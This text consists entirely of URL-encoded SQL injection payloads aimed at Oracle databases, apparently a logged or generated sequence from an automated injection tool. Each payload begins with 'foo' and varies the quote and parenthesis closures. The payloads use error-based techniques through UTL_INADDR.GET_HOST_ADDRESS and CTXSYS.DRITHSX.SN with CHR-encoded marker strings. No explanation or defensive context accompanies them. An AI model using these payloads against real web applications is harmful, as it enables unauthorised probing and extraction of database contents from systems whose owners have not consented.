foo%29%29%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%286739%3D6739 foo%29%29%29%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%28%284881%3D4881 foo%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29 foo%27%29%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%27itPx%27%3D%27itPx foo%27%29%29%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27GGgw%27%3D%27GGgw foo%27%29%29%29%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27eRPv%27%3D%27eRPv foo%27%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%27nusO%27%3D%27nusO foo%27%29%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%27XWyq%27%20LIKE%20%27XWyq foo%27%29%29%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27GPLO%27%20LIKE%20%27GPLO foo%27%29%29%29%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27zXxJ%27%20LIKE%20%27zXxJ foo%27%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%27qZpl%27%20LIKE%20%27qZpl foo%22%29%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%22QjWT%22%3D%22QjWT foo%22%29%29%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%28%22uZmY%22%3D%22uZmY foo%22%29%29%29%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%22JSgG%22%3D%22JSgG foo%22%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%22YFbS%22%3D%22YFbS foo%22%29%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%22wxBu%22%20LIKE%20%22wxBu foo%22%29%29%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%28%22KAts%22%20LIKE%20%22KAts foo%22%29%29%29%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%22GxDQ%22%20LIKE%20%22GxDQ foo%22%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%22MvUY%22%20LIKE%20%22MvUY foo%25%27%29%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%27%25%27%3D%27 foo%00%27%29%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%28%27wuQM%27%3D%27wuQM foo%00%27%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AND%20%27EPqN%27%3D%27EPqN foo%27%29%20WHERE%205222%3D5222%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20--%20 foo%22%29%20WHERE%202808%3D2808%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20--%20 foo%29%20WHERE%207111%3D7111%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20--%20 foo%27%20WHERE%208684%3D8684%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20--%20 foo%22%20WHERE%206752%3D6752%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20--%20 foo%20WHERE%206846%3D6846%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20--%20 foo%27%7C%7C%28SELECT%20%27RtiJ%27%20FROM%20DUAL%20WHERE%208809%3D8809%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27VimG%27%20WHERE%206397%3D6397%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20%29%7C%7C%27 foo%27%2B%28SELECT%20mIrR%20WHERE%202352%3D2352%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20%29%2B%27 foo%27%2B%28SELECT%20%27CkXI%27%20WHERE%205297%3D5297%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%208367%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288367%3D8367%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20%23 foo%29%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29 foo%27%29%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29 foo%27%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29 foo%22%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29 foo%29%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%287127%3D7127 foo%29%29%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%282532%3D2532 foo%29%29%29%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%286897%3D6897 foo%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29 foo%27%29%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27oyhU%27%3D%27oyhU foo%27%29%29%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27RxPw%27%3D%27RxPw foo%27%29%29%29%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27cbwP%27%3D%27cbwP foo%27%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%27ePEM%27%3D%27ePEM foo%27%29%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27WXdo%27%20LIKE%20%27WXdo foo%27%29%29%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27cIGh%27%20LIKE%20%27cIGh foo%27%29%29%29%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27lfsK%27%20LIKE%20%27lfsK foo%27%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%27BFTz%27%20LIKE%20%27BFTz foo%22%29%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%22WuqZ%22%3D%22WuqZ foo%22%29%29%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%22dqYT%22%3D%22dqYT foo%22%29%29%29%20AND%209866%3DCTXSYS.DRITHSX.SN%289866%2C%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289866%3D9866%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%22qhHF%22%3D%22qhHF 